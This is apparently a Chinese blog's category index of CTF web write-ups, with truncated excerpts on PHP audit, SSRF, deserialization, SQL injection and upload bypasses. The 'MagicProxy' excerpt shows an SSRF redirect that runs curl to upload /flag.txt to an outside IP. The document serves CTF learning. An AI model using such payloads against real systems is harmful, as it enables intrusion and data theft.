随笔分类 - CTF历程
CTF历程
摘要:Web Mercy-code <?php highlight_file(__FILE__); if ($_POST['cmd']) { $cmd = $_POST['cmd']; if (';' preg_replace('/[a-z_]+\((?R)?\)/', '', $cmd)) { if (
阅读全文
摘要:MagicProxy ssrf重定向绕过 <?php header("Location:http://127.0.0.1:8080/admin?command=curl%20-F%20file=@/flag.txt%20http%3A%2F%2F82.157.174.226%3A8888"); ex
阅读全文
摘要:popop 访问class.php 简单,直接exp <?php class s{ public $f; public function __construct() { $this->f = new T; } } class T{ public $f; public $s; public funct
阅读全文
摘要:online_crt 通过以下点进行CRLF触发/admin/rename处修改crt文件名 经过本地多次测试获得payload uri=/admin%252Frename%3Foldname%3D4c9a3b84-f582-42e2-b1db-21d44c982eb6.crt%26newname%
阅读全文
摘要:积分榜 Web SimpleRCE 非预期 盲读/flag,通过请求头传入参数绕过waf 预期 利用原生类! phpdest 原题:https://www.shawroot.cc/1917.html <?php highlight_file(__FILE__); require_once 'flag
阅读全文
摘要:冬奥会 <?php show_source(__FILE__); $Step1=False; $Step2=False; $info=(array)json_decode(@$_GET['Information']); if(is_array($info)){ var_dump($info); is
阅读全文
摘要:Web Sign_in <?php highlight_file(__FILE__); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $_GET['url']); curl_setopt($ch, CURLOPT_HEADER, 0); curl_
阅读全文
摘要:Web easy_php 审计源码: <?php highlight_file(__FILE__); error_reporting(0); function new_addslashes($string) { if(!is_array($string)) return addslashes($st
阅读全文
摘要:前言 没想到第一次拿一血还是因为被做核酸叫起来,然后睡不着做的题! Web ez_unserialize 源码: <?php class A { public $var1; public $var2; public $secret; function __construct($p1, $p2) {
阅读全文
摘要:前言 感谢西电举办的这次抗疫CTF,既是宣传了CTF,也可以让大家学到更多的抗疫知识,让我们一起为西安加油! Web F12 AAEncode加密 ゚ω゚ノ= /`m´)ノ ~┻━┻ //*´∇`*/ ['_']; o=(゚ー゚) =_=3; c=(゚Θ゚) =(゚ー゚)-(゚ー゚); (゚Д゚)
阅读全文
摘要:这次的长安“战疫”搞得还挺大的,那么多大佬都来比赛了,我摸摸鱼就好... Web RCE_No_Para 看到这么短的审计就心慌, <?php if(';' preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { if(!preg_match(
阅读全文
摘要:前言 好几天都没发文章了,这几天去肝工大抗疫比赛去了,这比赛主要考了信息搜集能力,除Web以外我没觉得学到多少东西 ~~太笨了,搜题我竟然只用google,以后记得把Bing、Baidu、搜狗什么的都用上~~ 我什么都没说,大家以后打比赛不要像我一样,还是钻研技术为主,~~大型比赛~~上还是要认真对
阅读全文
摘要:[2019强网杯]随便注 考点:1、堆叠注入 2、sql预处理语句 之前做过的一道题,再次遇到发现还是有很多需要学习的地方,也没有记录过堆叠注入的题,所以就想着记一下这道题的一些知识点。 堆叠注入原理 在sql中,分号;是用来表示一条sql语句的结束。 所以在;后再接一个sql语句将会一起执行,从而
阅读全文
摘要:Loginme 有源码,没学过go,瞎看middleware.go package middleware import ( "github.com/gin-gonic/gin" ) func LocalRequired() gin.HandlerFunc { return func(c *gin.C
阅读全文
摘要:Web [签到] flag 等一会后把内容复制下来,然后执行一下脚本: import re import base64 flag = '' f = open('flag.txt', 'r') content = f.read() for i in range(20): match = re.sear
阅读全文
摘要:bestphp's revenge 考点:1、SoapClient触发反序列化导致ssrf 2、serialize_hander处理session方式不同导致session注入 又学到了一个新的知识点 首页面给出了源码 index.php <?php highlight_file(__FILE__)
阅读全文
摘要:[WUSTCTF2020]CV Maker 考点:文件上传 bypass 进入题目,一个看着非常复杂得页面 通过瞎点一通或者通过查看源码,发现就只有注册和登录功能是可以用的,所以先来注册一个账号登录进去。 登录成功后发现可以上传文件,通过测试猜测是通过文件头信息进行过滤的,其余没有任何过滤,所以先上
阅读全文
摘要:[SWPUCTF 2018]SimplePHP 考点:1、PHP代码审计 2、Phar反序列化漏洞 网站中有两个功能:查看文件和上传文件,利用查看文件将源码都先弄下来进行PHP代码审计。 file.php <?php header("content-type:text/html;charset=ut
阅读全文
摘要:[SUCTF 2019]EasyWeb 考点:1、文件上传 bypass 2、.htaccess的利用 开局源代码 <?php function get_the_flag(){ // webadmin will remove your upload file every 20 min!!!! $us
阅读全文
摘要:[NCTF2019]SQLi 考点:sql bypass 一道sql题,非常友好的给出了sqlquery,但想必也不简单 sqlquery : select * from users where username='1' and passwd='1' 这中语句非常典型,不试都能猜到必然过滤了',在u
阅读全文